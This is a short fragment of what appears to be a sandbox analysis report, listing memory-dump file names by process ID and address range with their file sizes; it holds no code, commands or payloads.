    • memory/1088-10-0x000000001AF20000-0x000000001AF21000-memory.dmp
      Filesize

      4KB

    • memory/1092-20-0x00000000750C1000-0x00000000750C3000-memory.dmp
      Filesize

      8KB

    • memory/1092-19-0x0000000000000000-mapping.dmp
    • memory/1092-31-0x00000000001E0000-0x0000000000201000-memory.dmp
      Filesize

      132KB

    • memory/1092-32-0x0000000010000000-0x0000000010024000-memory.dmp
      Filesize

      144KB

    • memory/1652-43-0x000007FEF5BC0000-0x000007FEF5E3A000-memory.dmp
      Filesize

      2.5MB

    • memory/1744-25-0x0000000000000000-mapping.dmp
    • memory/1892-37-0x0000000000000000-mapping.dmp
    • memory/1928-17-0x0000000000000000-mapping.dmp
    • memory/1932-2-0x0000000071EA1000-0x0000000071EA4000-memory.dmp
      Filesize

      12KB

    • memory/1932-3-0x000000006F921000-0x000000006F923000-memory.dmp
      Filesize

      8KB

    • memory/1932-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB